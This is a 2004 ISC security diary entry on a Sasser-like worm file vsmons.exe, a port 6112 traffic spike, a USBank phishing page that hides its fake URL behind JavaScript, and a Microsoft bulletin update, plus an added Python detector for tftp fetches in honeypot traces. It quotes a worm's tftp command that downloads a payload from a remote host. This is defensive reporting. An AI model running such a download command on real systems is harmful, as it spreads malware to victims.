Vsmons.exe / Port 6112 / USBank phishing / MS04-22 Update

Published: 2004-07-20
Last Updated: 2004-07-20 22:39:31 UTC
by Pedro Bueno (Version: 1)

We received a report about traffic on port 445 and an application called vsmons.exe (not the Zone Alarm vsmon.exe).
If you have a sample of this application, please send it to us and our malware group will take a look at it.

UPDATE: This looks like Sasser. The following honeypot trace shows a similar file:

tftp -i xxx.xxx.91.114 get vsmons.exe


Reference: http://wilderssecurity.com/showthread.php?t=41732
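
An added example, not part of the original diary or any ISC tooling: one way to pull tftp fetches out of a honeypot command trace and flag file names that imitate a legitimate process name, the way vsmons.exe imitates Zone Alarm's vsmon.exe. The KNOWN_GOOD list, the distance threshold and every sample line except the first are assumptions made for illustration.

```python
import re

# Assumption: legitimate process names worth guarding against look-alikes.
# vsmon.exe (Zone Alarm) is named in the diary; the others are illustrative.
KNOWN_GOOD = {"vsmon.exe", "svchost.exe", "lsass.exe"}

# Windows tftp client syntax: tftp [-i] host get source
TFTP_RE = re.compile(r"\btftp(?:\.exe)?\s+(?:-i\s+)?(\S+)\s+get\s+(\S+)", re.I)

def edit_distance(a, b):
    """Levenshtein distance, two-row dynamic programming."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]

def lookalike_of(name, max_dist=2):
    """Return the known-good name that `name` imitates, or None."""
    name = name.lower()
    if name in KNOWN_GOOD:
        return None  # exact match is the real name, not an imitation
    for good in sorted(KNOWN_GOOD):
        if edit_distance(name, good) <= max_dist:
            return good
    return None

def scan(lines):
    """Yield (host, file, imitated_name) for each tftp fetch in the trace."""
    for line in lines:
        m = TFTP_RE.search(line)
        if m:
            host, path = m.groups()
            fname = path.replace("\\", "/").rsplit("/", 1)[-1]
            yield host, fname, lookalike_of(fname)

# Constructed sample trace; only the first command comes from the diary.
SAMPLE = [
    "tftp -i xxx.xxx.91.114 get vsmons.exe",
    "tftp -i 192.0.2.10 get update.exe",
    "echo open 192.0.2.10 > o.txt",
]

if __name__ == "__main__":
    for host, fname, imitated in scan(SAMPLE):
        note = f"look-alike of {imitated}" if imitated else "no known look-alike"
        print(f"{host}\t{fname}\t{note}")
```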

Traffic Spikes

Another report of strange traffic concerns port 6112 TCP. A user noticed a spike on this port and wondered whether it may be the result of the recent CDE vulnerability. There were some spikes in the last 40 days, according to ISC data, but the sources remain stable.

Reference: http://isc.sans.org/port_details.php?port=6112

USBank phishing

We received a USBank phishing report. This one is interesting because it uses JavaScript to create a window showing a valid USBank URL on top of the fake URL.
This is interesting but not new. A post to Bugtraq on May 13 shows a very similar phish. The difference here is the fake URL, which in this example is http://www.usbnk-update.info/secure and in the previous one was http://validation-required.info .
Again, this only works on IE.

Reference: http://www.securityfocus.com/archive/1/363326

MS04-22 Update

Microsoft just updated the MS04-22 security bulletin. It now lists more workarounds, which may help people who had problems with the patch.

Reference: http://www.microsoft.com/technet/security/bulletin/MS04-022.mspx


Handler on Duty: Pedro Bueno (bueno_AT_ieee.org)